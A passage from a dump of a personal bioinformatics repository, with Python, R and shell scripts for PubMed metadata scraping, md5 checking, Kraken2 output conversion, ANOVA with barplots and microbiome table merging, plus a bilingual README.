list(bar_dt.groupby('Tax').mean().sort_values(by = 'Mean', ascending = False).index)\nwith open('plot_tax_order', 'w') as out:\n print(tax_order, file=out)\n"
},
{
"alpha_fraction": 0.556639552116394,
"alphanum_fraction": 0.5905148983001709,
"avg_line_length": 36.272727966308594,
"blob_id": "0c7a6d636061953829704c1cebbf361e5e6393d0",
"content_id": "6e10fbbe054e6af52e34d9eddbac8393fae5ca06",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3962,
"license_type": "no_license",
"max_line_length": 214,
"num_lines": 99,
"path": "/爬虫/advanced_paper_informational.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "from selenium import webdriver\nfrom bs4 import BeautifulSoup\nfrom selenium.webdriver import ActionChains \nfrom selenium.webdriver.support.ui import Select\nfrom selenium.webdriver.common.keys import Keys #这个没有用上\nimport time,os,re\n\n# browser = webdriver.Chrome() # 这个是模拟浏览器打开.. \nop = webdriver.ChromeOptions()\nop.add_argument('headless')\nbrowser = webdriver.Chrome(options=op) #op 这三行可以不用打开浏览器..\nurl = 'https://pubmed.ncbi.nlm.nih.gov/'\n\n\nout = open('paper_information.xls', 'w')\ndoi_list = ['DOI: 10.1016/S0140-6736(19)32319-0', 'DOI: 10.1038/s41575-019-0209-8','DOI: 10.1016/j.tips.2019.04.006','DOI: 10.1038/nrc2857', 'DOI: 10.1038/ismej.2015.11', 'DOI: 10.1038/s41591-018-0160-1'] \n \n# 杂志名称全称\nj_name = dict()\nwith open('J_Medline.txt', 'r') as IN:\n for line in IN:\n line = line.strip('\\n')\n if line.startswith('JournalTitle'): \n if re.search(' \\(.*\\)', line): #发现有带(London, England)这种信息的。。。。\n match = re.search('JournalTitle: (.*) \\(.*\\)', line) \n else:\n match = re.search('JournalTitle: (.*)', line) # ncbi 是缩写,然后影响因子是全称,所以得找到这个信息\n full = match.group(1)\n if line.startswith('MedAbbr'):\n match = re.search('MedAbbr: (.*)', line)\n abbr = match.group(1)\n if line.startswith('NlmId'):\n j_name[abbr] = full\n \n# 杂志 IF\nimport pandas as pd\ndt = pd.read_table('IF_2019.txt', index_col = 1)\nIF_dict = dt['Journal Impact Factor'].to_dict()\n\nfor x in doi_list:\n DOI = x\n browser.get(url)\n time.sleep(3)\n browser.find_element_by_xpath('//*[@name=\"term\"]').send_keys(x)\n time.sleep(2)\n browser.find_element_by_xpath('//*[@class=\"search-btn\"]').click()\n time.sleep(2)\n soup = BeautifulSoup(browser.page_source, \"html.parser\")\n \n # journal name abbr\n journal = soup.find(id = \"full-view-journal-trigger\").get_text().strip()\n\n # title\n title = soup.find(class_ = \"heading-title\").get_text().strip()\n \n # IF\n for x in IF_dict:\n match = re.search('^' + j_name[journal] + '$', x, flags=re.IGNORECASE) # 有的名字包含其他杂志的全称... \n if match:\n IF = IF_dict[x]\n journal_name = j_name[journal]\n else:\n match = re.search('^' + j_name[journal].replace('.','') + '$', x, flags=re.IGNORECASE) # 有的杂志匹配出来的全称多了个点:Nature reviews. Immunology\n if match:\n journal_name = j_name[journal].replace('.','')\n IF = IF_dict[x]\n\n\n # 发表时间\n if soup.find(class_ = \"secondary-date\"):\n p_time = soup.find(class_ = \"secondary-date\").get_text().strip().strip('Epub ').strip('.')\n else:\n p_time = soup.find(class_ = \"cit\").get_text().split(\";\")[0]\n\n # PMID \n PMID = soup.find(class_ = \"current-id\").get_text()\n\n\n #原文链接\n doi_info = soup.find(class_ = \"identifier doi\") \n http = doi_info.find(class_ = \"id-link\")['href'] # 增加这一步是因为偶尔会出现 NCBI 的链接\n\n # 一作和通讯\n authors = soup.find(class_ = \"authors-list\").get_text().strip().replace(u'\\xa0', '').replace(u'\\xa0', '').replace(' ', '')\n author_list = re.sub('\\n\\w*', '', authors).split(',')\n first_author = author_list[0]\n corresponding_author = author_list[-1]\n\n # 第一单位\n affiliations = soup.find(class_ = \"affiliations\").get_text().strip()\n affiliations = re.sub('[ ]+', ' ', affiliations)\n affiliations_list = re.sub('[\\n]{2,}', '', affiliations).split('\\n')\n first_affiliation = affiliations_list[1].lstrip(' 0123456789')\n\n line = '\\t'.join([title, journal_name, p_time.replace('.', ''), PMID, DOI, http, IF, first_author, corresponding_author, first_affiliation])\n print(line, file = out)\n print(line)\n \nout.close()\n"
},
{
"alpha_fraction": 0.6732348203659058,
"alphanum_fraction": 0.6929392218589783,
"avg_line_length": 45.846153259277344,
"blob_id": "5f50371995f5642377cd0c6ec3b11255ef3944f1",
"content_id": "795c96864a3d57775c6ee185a767431ad4a8a1a3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 633,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 13,
"path": "/rat/beta/merge.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "import pandas as pd\n#合并组间或组内的距离文件\nACK = pd.read_table('ACK-ACK.distance.txt', header=0, index_col=0)\nEL = pd.read_table('EL-EL.distance.txt', header=0, index_col=0)\nCig = pd.read_table('Cig-Cig.distance.txt', header=0, index_col=0)\nmerge = pd.concat([ACK,EL,Cig])\nmerge.to_csv('intra_group.txt', sep='\\t')\n\nACK_Cig = pd.read_table('ACK-Cig.distance.txt', header=0, index_col=0)\nACK_EL = pd.read_table('ACK-EL.distance.txt', header=0, index_col=0)\nEL_Cig = pd.read_table('EL-Cig.distance.txt', header=0, index_col=0)\ntwo_merge = pd.concat([ACK_Cig,ACK_EL,EL_Cig])\ntwo_merge.to_csv('inter_group.txt', sep='\\t')\n"
},
{
"alpha_fraction": 0.4752475321292877,
"alphanum_fraction": 0.5,
"avg_line_length": 31.31999969482422,
"blob_id": "b078726132a3f55c61bc2d374e7a27f3af716148",
"content_id": "b9ffc349d62bccdd207018e3a4ce7969d1c2bdde",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 912,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 25,
"path": "/mac_md5.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "# 发现 mac 下没有找到合适的 md5 校验工具,所以写了个脚本,用于和 linux 下 md5sum 产生的文件 md5 值进行校验,较简略\nimport re,os\nos.system('md5 *gz > temp.md5')\n# transform 转化格式\nwith open('temp.md5','r') as IN, open('new.md5', 'w') as out:\n for line in IN:\n match = re.search('MD5 \\((.*)\\) = (\\w+)',line)\n if match:\n print(match.group(2) + ' ' + match.group(1), file=out)\n\n#比较前后文件的 md5\nDcit = dict()\nwith open('md5.txt','r') as IN:\n for line in IN:\n lst = line.strip('\\n').split(' ')\n Dcit[lst[0]] = lst[1]\nwith open('new.md5','r') as IN:\n for line in IN:\n lst = line.strip('\\n').split(' ')\n if lst[0] in Dcit:\n if Dcit[lst[0]] == lst[1]:\n continue\n # print(lst[1] + ' is ok\\n')\n else:\n print(lst[0] + ' is not ok!')\n"
},
{
"alpha_fraction": 0.6509919166564941,
"alphanum_fraction": 0.6767082810401917,
"avg_line_length": 55.70833206176758,
"blob_id": "53d41d1aa198a95677a74b261e13b6eb6d251329",
"content_id": "256873ae63f4163fa1f41f76f94cc1022b5bc32d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1527,
"license_type": "no_license",
"max_line_length": 334,
"num_lines": 24,
"path": "/plotIdGenerate.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "# 统计丰度表中,所有大于 1(1%)的物种的 ID, 画柱状图时, 需要把在所有样品中小于 1% 的物种合并为 others, 想了半天才想起来这个脚本的功能,必须得做好日志文件呀.\n# 通用性不高,记在此处只是当做记录脚本.\n#! /usr/bin/python3\nimport argparse,re\nparser = argparse.ArgumentParser(description = \"based on the abundance file,get the species ID for with abundance > 1% in any of sample, for the x axis text of barplot of before and after two groups...not very clear.\")\nparser.add_argument('-i','--Input', help = \"the input file\")\nparser.add_argument('-o','--Output', help = \"the output directory\")\nargs=parser.parse_args()\n(Input,Output) = (args.Input,args.Output)\nif not Input or not Output:\n print(\"Plase add the parameters,thank you :)\\n\\nExample: python3 plotIdGenerate.py -i /ifshk5/BC_COM_P11/F17HTSCCWLJ1810/RATdkdM/MetaPhlAn2/process/Taxonomy_MetaPhlAn2/MetaPhlAn2_Analysis/All/GoALL/phylumProfileTable.xls -o /ifshk5/BC_COM_P11/F17HTSCCWLJ1810/RATdkdM/MetaPhlAn2/process/Taxonomy_MetaPhlAn2/MetaPhlAn2_Analysis\\n\")\n exit()\nmatch = re.match('(.*)ProfileTable',Input.split(\"/\")[-1])\noutfile = Output + '/' + match.group(1) + 'ID'\nwith open(Input,'r') as IN,open(outfile,'w') as out:\n IN.readline()\n for line in IN:\n lst = line.strip('\\n').split('\\t')\n for index in range(1,len(lst)):\n if float(lst[index]) > 1:\n out.write(lst[0]+\"\\n\")\n break\n else:\n next\n"
},
{
"alpha_fraction": 0.8243243098258972,
"alphanum_fraction": 0.837837815284729,
"avg_line_length": 73,
"blob_id": "16cc81d4a49b79f60ac9330926c1c4dad3c9b70c",
"content_id": "17c4d72aed52922357476e4b140253b1ded3e40f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 74,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 1,
"path": "/rat/beta/beta.sh",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "python3 beta.py beta_diversity[dir] speciesProfileTable.xls species[plot]\n"
},
{
"alpha_fraction": 0.654974102973938,
"alphanum_fraction": 0.6664749979972839,
"avg_line_length": 33.07843017578125,
"blob_id": "cdadd79b7f43a5591f6c39354a9041f90c972794",
"content_id": "7af20a85578bba0d37212de147f3af7a4344d672",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1739,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 51,
"path": "/Kraken2/kraken_trans.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\nimport argparse,os,shutil,re,glob\nparser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description='''\n-------------------\nSimple Introduction:\nConvert the kark file of kraken2 to some new for krona sofaware.\nExample: python3 kraken_trans.py -i krakfile -o outdir\nTo be continued.\n------------------'''\n)\nparser.add_argument('-i','--Indir', help = \"the directory of krakfile by kraken2.\")\nparser.add_argument('-o','--outdir',help = \"the output directory, full path.\")\nparser.add_argument(\"-v\", \"--version\",action='version', version='%(prog)s 1.0')\nargs = parser.parse_args()\n(krakdir,outdir) = (args.Indir, args.outdir)\npar = [krakdir,outdir]\n\nif not all(par):\n\tparser.print_help()\n\texit()\n\nif os.path.exists(outdir):\n\tshutil.rmtree(outdir)\n\nos.makedirs(outdir)\nTaxid2Tax = dict()\nwith open('/ifswh1/BC_PS/wangpeng7/database/taxdump/taxonomy2sevenlevel.txt','r') as IN:\n\tfor line in IN:\n\t\tline = line.strip('\\n').split('\\t')\n\t\tTaxid2Tax[line[0]] = line[1]\n\nfor krakfile in glob.glob(krakdir + '/*krak'):\n\tbasename = os.path.basename(krakfile)\n\tmatch = re.search('(.*).krak', basename)\n\tprefix = match.group(1)\n\toutfile = outdir + '/' + prefix + '.trans.krak'\n\twith open(krakfile,'r') as IN, open(outfile,'w') as out:\n\t\tfor line in IN:\n\t\t\tlst = line.strip('\\n').split('\\t')\n\t\t\tseqId = lst[1]\n\t\t\ttax = lst[2]\n\t\t\ttax_match = re.search('taxid (\\d+)', tax)\n\t\t\ttaxId = tax_match.group(1)\n\t\t\tif taxId == '0':\n\t\t\t\tprint (seqId + '\\t' + 'Unclassified;Unclassified;Unclassified;Unclassified;Unclassified;Unclassified;Unclassified', file=out)\n\t\t\telif taxId in Taxid2Tax:\n\t\t\t\tprint(seqId + '\\t' + Taxid2Tax[taxId], file=out)\n\t#\t\telse:\n\t#\t\t\tprint(taxId + ' is not found! please check~')\n\n"
},
{
"alpha_fraction": 0.6360538601875305,
"alphanum_fraction": 0.6485477685928345,
"avg_line_length": 46.76744079589844,
"blob_id": "a4b983fba029dc142505c88f97254699d8388c7d",
"content_id": "0869eb607f35ba0aa0ab26acf2fe72727d973a47",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 6393,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 129,
"path": "/anova.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/Rscript\n# 计算个体间 SE 函数\nsummarySE <- function(data=NULL, measurevar, groupvars=NULL, na.rm=FALSE,\n conf.interval=.95, .drop=TRUE) {\n library(plyr)\n\n # New version of length which can handle NA's: if na.rm==T, don't count them\n length2 <- function (x, na.rm=FALSE) {\n if (na.rm) sum(!is.na(x))\n else length(x)\n }\n\n # This does the summary. For each group's data frame, return a vector with\n # N, mean, and sd\n datac <- ddply(data, groupvars, .drop=.drop,\n .fun = function(xx, col) {\n c(N = length2(xx[[col]], na.rm=na.rm),\n mean = mean (xx[[col]], na.rm=na.rm),\n sd = sd (xx[[col]], na.rm=na.rm)\n )\n },\n measurevar\n )\n\n # Rename the \"mean\" column \n datac <- rename(datac, c(\"mean\" = measurevar))\n\n datac$se <- datac$sd / sqrt(datac$N) # Calculate standard error of the mean\n\n # Confidence interval multiplier for standard error\n # Calculate t-statistic for confidence interval: \n # e.g., if conf.interval is .95, use .975 (above/below), and use df=N-1\n ciMult <- qt(conf.interval/2 + .5, datac$N-1)\n datac$ci <- datac$se * ciMult\n\n return(datac)\n}\n\n\n\nlibrary(ggplot2)\nlibrary(dplyr)\nlibrary(ggpubr)\nlibrary(car)\nArgs <- commandArgs(TRUE) \ntable = Args[1] # 阿尔法多样性和丰富度文件与分组信息合并以后的 FexposeDiversity.txt\nfilename_prefix = Args[2] # 分组文件 Sample_information_detail.txt Fexpose\n#group_list = Args[3] # Healthy:CASE\n\ndt = read.table(table, header=T)\ndt$Group = ordered(dt$Group, levels=c('CK','E-liquid','Cigarette')) # 标记\ntheme_set(theme_bw())\n# gene number \ndt_summary = summarySE(dt, measurevar=\"number\", groupvars=\"Group\")\n\nnumber_pc =ggplot(dt_summary, aes(x=Group, y=number, fill=Group)) + \n geom_bar(position=position_dodge(), stat=\"identity\") + \n geom_errorbar(aes(ymin=number-se, ymax=number+se),\n width=.2, # Width of the error bars\n position=position_dodge(10)) + # 实现条形距离的调整\n scale_fill_manual(values = c(\"#c8d1a2\", \"#87d1e0\", \"#dfb0ce\")) +\n labs(x=\"\", y = \"Gene Number\") + ggtitle(paste(filename_prefix, \"gene number barpplot\", sep=\" \")) + \n theme(plot.title = element_text(hjust = 0.5),\n axis.text = element_text(colour = 'black', size = 8),\n axis.text.x = element_text(vjust = 0.7),\n axis.title = element_text(size = 10),\n legend.key = element_blank(), legend.title = element_blank(),\n legend.position='none',plot.margin = unit(c(0.2,0.2, 0.2, 0.2), 'in')) # 上,右,下,左\n\nres.aov = aov(number ~ Group, data = dt)\nanova_number = summary(res.aov)\nanova_number = data.frame(unclass(anova_number), check.names = FALSE, stringsAsFactors = FALSE)\nTukey_number = TukeyHSD(res.aov)\nTukey_number = data.frame(unclass(Tukey_number), check.names = FALSE, stringsAsFactors = FALSE)\n\n#plot(res.aov, 1) # 方差齐性的图\nhomogeneity_number = leveneTest(number ~ Group, data = dt) # 方差齐性检验\nhomogeneity_number = data.frame(unclass(homogeneity_number), check.names = FALSE, stringsAsFactors = FALSE)\n#plot(res.aov, 2) # 正态分布的图\naov_residuals = residuals(object = res.aov) # Extract the residuals\nnormality_number = shapiro.test(x = aov_residuals) # 正态分布检验\nnormality_number = data.frame(unclass(normality_number), check.names = FALSE, stringsAsFactors = FALSE)\n\n# shannon index \ndt_summary = summarySE(dt, measurevar=\"shannon\", groupvars=\"Group\")\nshannon_pc = ggplot(dt_summary, aes(x=Group, y=shannon, fill=Group)) + \n geom_bar(position=position_dodge(), stat=\"identity\") + \n geom_errorbar(aes(ymin=shannon-se, ymax=shannon+se),\n width=.2, # Width of the error bars\n position=position_dodge(10)) + # 实现条形距离的调整\n scale_fill_manual(values = 
c(\"#c8d1a2\", \"#87d1e0\", \"#dfb0ce\")) +\n labs(x=\"\", y = \"shannon index\") + ggtitle(paste(filename_prefix, \"gene shannon barpplot\", sep=\" \")) + \n theme(plot.title = element_text(hjust = 0.5),\n axis.text = element_text(colour = 'black', size = 8),\n axis.text.x = element_text(vjust = 0.7),\n axis.title = element_text(size = 10),\n legend.key = element_blank(), legend.title = element_blank(),\n legend.position='none',plot.margin = unit(c(0.2,0.2, 0.2, 0.2), 'in')) # 上,右,下,左\n \nres.aov = aov(shannon ~ Group, data = dt)\nanova_shannon = data.frame(unclass(summary(res.aov)), check.names = FALSE, stringsAsFactors = FALSE)\nTukey_shannon = TukeyHSD(res.aov)\nTukey_shannon = data.frame(unclass(TukeyHSD(res.aov)), check.names = FALSE, stringsAsFactors = FALSE)\n#plot(res.aov, 1) # 方差齐性的图\nhomogeneity_shannon = leveneTest(shannon ~ Group, data = dt) # 方差齐性检验\nhomogeneity = data.frame(unclass(homogeneity_shannon), check.names = FALSE, stringsAsFactors = FALSE)\n#plot(res.aov, 2) # 正态分布的图\naov_residuals = residuals(object = res.aov) # Extract the residuals\nnormality_shannon = shapiro.test(x = aov_residuals) # 正态分布检验\nnormality_shannon = data.frame(unclass(normality_shannon), check.names = FALSE, stringsAsFactors = FALSE)\n\n# output\npdf(paste(filename_prefix,\"_number_barplot.pdf\",sep=\"\"),width=6,height=4)\nnumber_pc\ndev.off()\n\npdf(paste(filename_prefix,\"_shannon_barplot.pdf\",sep=\"\"),width=6,height=4)\nshannon_pc\ndev.off()\n\nwrite.table(anova_number,file = paste(filename_prefix,\"_anova_number.txt\", sep=\"\"),sep = \"\\t\",quote = F)\nwrite.table(Tukey_number,file = paste(filename_prefix,\"_Tukey_number.txt\", sep=\"\"),sep = \"\\t\",quote = F)\nwrite.table(homogeneity_number,file = paste(filename_prefix,\"_homogeneity_number.txt\", sep=\"\"),sep = \"\\t\",quote = F)\nwrite.table(normality_number,file = paste(filename_prefix,\"_normality_number.txt\", sep=\"\"),sep = \"\\t\",quote = F)\n\nwrite.table(anova_shannon,file = paste(filename_prefix,\"_anova_shannon.txt\", sep=\"\"),sep = \"\\t\",quote = F)\nwrite.table(Tukey_shannon,file = paste(filename_prefix,\"_Tukey_shannon.txt\", sep=\"\"),sep = \"\\t\",quote = F)\nwrite.table(homogeneity_shannon,file = paste(filename_prefix,\"_homogeneity_shannon.txt\", sep=\"\"),sep = \"\\t\",quote = F)\nwrite.table(normality_shannon,file = paste(filename_prefix,\"_normality_shannon.txt\", sep=\"\"),sep = \"\\t\",quote = F)\n\n"
},
{
"alpha_fraction": 0.6998792290687561,
"alphanum_fraction": 0.7077294588088989,
"avg_line_length": 45,
"blob_id": "bb96d9e11593307472f482bc3178366b209b96b3",
"content_id": "5555d230960722e9816f6ed3b230f0aad358ad89",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 1686,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 36,
"path": "/Maaslin/tsvGeneration.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/Rscript #写得挺烂的。。。有时间改改。。\nArgs <- commandArgs(TRUE)\nabundance_table = Args[1] # should begin with \"SampleID\", to be continued\ngroup_table = Args[2] # group informational should be 'Group', should begin with \"#SampleID\"\nindice = Args[3] # Age:BMI:SUA\ngroup = Args[4] #T0:Control\nprefix = Args[5] #\noutdir = Args[6]\nindice_list = unlist(strsplit(indice,\":\"))\ngroup_list = unlist(strsplit(group,\":\"))\nfilename_prefix= gsub(\":\", \"_\", indice)\nfilename = paste(paste(prefix,filename_prefix, sep=\"_\"),\"tsv\", sep=\".\")\noutfile = paste(outdir,filename,sep=\"/\")\ninfo = read.table(group_table,header = T,sep = \"\\t\",comment.char = \"\", check.names =F)\n#index = info$SamplingTime %in% group_list #gout\nindex = info$Group %in% group_list\ninfoSub = info[index,] #select lines contain \"T0\" and \"Control\"\nindices = c(\"#SampleID\",indice_list)\ninfoSub_indice = subset(infoSub,select = indices)# select data according to colnames\ncolnames(infoSub_indice)[1] = \"SampleID\"\n## delete lines contain \"NA\"\ndelSample = as.character(infoSub_indice[!complete.cases(infoSub_indice),]$SampleID) # need delete sampleID\nneedInfo = infoSub_indice[!infoSub_indice$SampleID %in% delSample,]\n\nprofile = read.table(abundance_table,header = T,sep = \"\\t\")\nprofile_t = t(profile)\ncolnames(profile_t) = profile_t[1,]\nprofile_t = profile_t[-1,]\nprofileDel = profile_t[rownames(profile_t) %in% needInfo[,1],]\nmode(profileDel) <- \"numeric\"\nprofileNorm = profileDel\nrownames(needInfo) = needInfo$SampleID\nmerge.tsv = merge(needInfo,profileNorm, by = 'row.names', all = T)\n#print(merge.tsv)\nmerge.tsv = merge.tsv[,-1]\nwrite.table(merge.tsv,file = outfile ,sep = \"\\t\",quote = F,row.names = F)\n"
},
{
"alpha_fraction": 0.617393434047699,
"alphanum_fraction": 0.6299580931663513,
"avg_line_length": 42.180850982666016,
"blob_id": "40013e2735c099dc1bb39784a6cbf2c4e5b6ee76",
"content_id": "9add9a5e2c8d9951f609e20456d2e6a764501523",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 4209,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 94,
"path": "/rat/beta/anova.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/Rscript\n# 计算个体间 SE 函数\nsummarySE <- function(data=NULL, measurevar, groupvars=NULL, na.rm=FALSE,\n conf.interval=.95, .drop=TRUE) {\n library(plyr)\n\n # New version of length which can handle NA's: if na.rm==T, don't count them\n length2 <- function (x, na.rm=FALSE) {\n if (na.rm) sum(!is.na(x))\n else length(x)\n }\n\n # This does the summary. For each group's data frame, return a vector with\n # N, mean, and sd\n datac <- ddply(data, groupvars, .drop=.drop,\n .fun = function(xx, col) {\n c(N = length2(xx[[col]], na.rm=na.rm),\n mean = mean (xx[[col]], na.rm=na.rm),\n sd = sd (xx[[col]], na.rm=na.rm)\n )\n },\n measurevar\n )\n\n # Rename the \"mean\" column\n datac <- rename(datac, c(\"mean\" = measurevar))\n\n datac$se <- datac$sd / sqrt(datac$N) # Calculate standard error of the mean\n\n # Confidence interval multiplier for standard error\n # Calculate t-statistic for confidence interval:\n # e.g., if conf.interval is .95, use .975 (above/below), and use df=N-1\n ciMult <- qt(conf.interval/2 + .5, datac$N-1)\n datac$ci <- datac$se * ciMult\n\n return(datac)\n}\nlibrary(ggplot2)\nlibrary(\"carData\", lib.loc=\"R_lib\")\nlibrary(\"car\", lib.loc=\"R_lib\")\nArgs <- commandArgs(TRUE)\nfilename = Args[1] # 阿尔法多样性和丰富度文件与分组信息合并以后的 FexposeDiversity.txt\nfilename_prefix = Args[2] # Fexpose\nplot_title = Args[3] # genus\norder = Args[4] # ACK:EL:Cig\nitem = Args[5] # distance\ngroup = Args[6] # group\n\nlevel_order = unlist(strsplit(order,\":\"))\ndt = read.table(filename, header=T)\ndt$group = ordered(dt$group, levels=level_order) # 标记\ntheme_set(theme_bw())\n\n#SE\ndt_summary = summarySE(dt, measurevar=item, groupvars=group)\n\npc =ggplot(dt_summary, aes_string(x=group, y=item, fill=group)) +\n geom_bar(position=position_dodge(), stat=\"identity\") +\n geom_errorbar(aes(ymin=dt_summary[[item]]-se, ymax=dt_summary[[item]]+se), # 太机智了 8..\n width=.2, # Width of the error bars\n position=position_dodge(10)) + # 实现条形距离的调整\n scale_fill_manual(values = c(\"#c8d1a2\", \"#87d1e0\", \"#dfb0ce\")) +\n labs(x=\"\", y = item) + ggtitle(paste(filename_prefix, plot_title, item,\"barpplot\", sep=\" \")) +\n theme(plot.title = element_text(hjust = 0.5),\n axis.text = element_text(colour = 'black', size = 8),\n axis.text.x = element_text(vjust = 0.7),\n axis.title = element_text(size = 10),\n legend.key = element_blank(), legend.title = element_blank(),\n legend.position='none',plot.margin = unit(c(0.2,0.2, 0.2, 0.2), 'in')) # 上,右,下,左\n\nrun = paste(\"res.aov = aov(\",item,\" ~ \",group,\",data=dt)\", sep=\"\")\neval(parse(text = run))\nanova = summary(res.aov)\nanova = data.frame(unclass(anova), check.names = FALSE, stringsAsFactors = FALSE)\nTukey = TukeyHSD(res.aov)\nTukey = data.frame(unclass(Tukey), check.names = FALSE, stringsAsFactors = FALSE)\n#plot(res.aov, 1) # 方差齐性的图\nrun = paste(\"homogeneity = leveneTest(\",item,\" ~ \",group,\",data=dt)\", sep=\"\")\neval(parse(text = run))\n#homogeneity = leveneTest(item ~ group, data = dt) # 方差齐性检验\nhomogeneity = data.frame(unclass(homogeneity), check.names = FALSE, stringsAsFactors = FALSE)\n#plot(res.aov, 2) # 正态分布的图\naov_residuals = residuals(object = res.aov) # Extract the residuals\nnormality = shapiro.test(x = aov_residuals) # 正态分布检验\nnormality = data.frame(unclass(normality), check.names = FALSE, stringsAsFactors = FALSE)\n\n# output\npdf(paste(filename_prefix,\"_\",item,\"_barplot.pdf\",sep=\"\"),width=6,height=4)\npc\ndev.off()\nwrite.table(anova,file = paste(filename_prefix,\"_anova_\",item,\".txt\", sep=\"\"),sep = 
\"\\t\",quote = F,col.names=NA)\nwrite.table(Tukey,file = paste(filename_prefix,\"_Tukey_\",item,\".txt\", sep=\"\"),sep = \"\\t\",quote = F,col.names=NA)\nwrite.table(homogeneity,file = paste(filename_prefix,\"_homogeneity_\",item,\".txt\", sep=\"\"),sep = \"\\t\",quote = F,col.names=NA)\nwrite.table(normality,file = paste(filename_prefix,\"_normality_\",item,\".txt\", sep=\"\"),sep = \"\\t\",quote = F,col.names=NA)\n"
},
{
"alpha_fraction": 0.7617554664611816,
"alphanum_fraction": 0.7633228898048401,
"avg_line_length": 50.040000915527344,
"blob_id": "47f340358cd08d304d087aede0406366cbc25a19",
"content_id": "ed2eeb2cd249b748a90e22e79fe895e92acd1699",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1748,
"license_type": "no_license",
"max_line_length": 218,
"num_lines": 25,
"path": "/Paper_information/README.md",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "## Paper_information.sh \nBased on doi, you can use this script to crawl information about paper such as title, journal name, IF... and download the pdf. \n\nThe scihub.py were edited based on [scihub.py/scihub.py at master · zaytoun/scihub.py · GitHub](https://github.com/zaytoun/scihub.py/blob/master/scihub/scihub.py)\n\nBefore use, you need to install some packages or sofeware, including phantomjs, Selenium, BS4 for advanced_paper_informational.py (based on selenium) and requests, retrying, pysocks for scihub.py (based on requests). \n\nYou should also add these to your envirment variable (export or edit the .bashrc file)\n\n## Paper_information.sh (中文版说明)\n只需要输入 DOI,就可以得到文献题目,杂志名称,发表时间,PMID,文献DOI,文献原文网址,一作(第一个位置),通讯(最后一个位置),第一单位等信息,以及下载文献功能。 \n\nscihub.py 是在这个链接上基础稍微改动一点儿得到的: [scihub.py/scihub.py at master · zaytoun/scihub.py · GitHub](https://github.com/zaytoun/scihub.py/blob/master/scihub/scihub.py)。\n\n使用之前,你可能需要安装一些软件或者包,比如 phantomjs, Selenium, BS4 (advanced_paper_informational.py,基于 selenium 爬取) 和 requests, retrying, pysocks (scihub.py,基于 requests 爬取)。 \n然后记得添加至环境变量。\n\n## 大道理 \n\"Everything should be made as simple as possible, but no simpler.\" \n『一切应该尽可能简单,但不能过于简单。』\n\n## 写在最后 \n后续想考虑怎么进行可视化.. \n因为是很粗糙的第一版,可能会有不少问题,如果遇到了,可以尝试联系我:[email protected] \n祝大家使用愉快~ 如果有人用的话.. :)\n"
},
{
"alpha_fraction": 0.6156657934188843,
"alphanum_fraction": 0.6234986782073975,
"avg_line_length": 35.132076263427734,
"blob_id": "6efe962f5de798183b8abd09ed7c90b903e83ade",
"content_id": "770037c4bb88ec973fa006265df8416d153e3339",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 2295,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 53,
"path": "/Phenotype/cat_diff.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "# /user/bin/Rscript \n# 对离散型变量进行差异检验,理论频数小于 5 用 fisher , 否则用卡方检验; 输出两种文件,一种是表型每种分类的的个数以及百分比,另外一种是差异检验的结果,暂且不用多重校正。\nlibrary(dplyr)\nlibrary(data.table)\ndt = read.table('../Samle_Information_categorical.xls', sep = '\\t', header = T)\ngroup = 'NS:FS:CS' #the colname of group is 'Group'\ngroup_list = unlist(strsplit(group, \":\"))\nindice_index = 3 #表型开始的列的位置,从 1 开始\n\nfileConn<-file(\"diff_results.xls\",'w')\nhead = paste('Characteristic', 'P value', 'Method', sep ='\\t')\nwriteLines(head, fileConn)\n\n# 计算连续变量的 sd 和 mean ... 但是我目前不需要这个...\n#temp = dt[c('Group', 'Age')]\n#ag = aggregate(. ~ Group, temp, function(x) c(mean = round(mean(x),2), sd = round(sd(x),2)))\n#ag_flat <- do.call(\"data.frame\", ag) # flatten\n\nfor (index in indice_index:ncol(dt)){\n indice = colnames(dt)[index]\n\tsub_dt = dt[c('Group',indice)] # 提取\n\t sub_dt = sub_dt[!(is.na(sub_dt[indice])),] 剔除表型的 Na 值,否则会对差异检验造成影响;\n\tfreq = sub_dt %>%\n group_by(Group, eval(parse(text = indice))) %>% # 将变量转化为内置变量(大概这么叫吧)\n summarise(n = n()) %>% # 天呐这个功能太好用了...\n 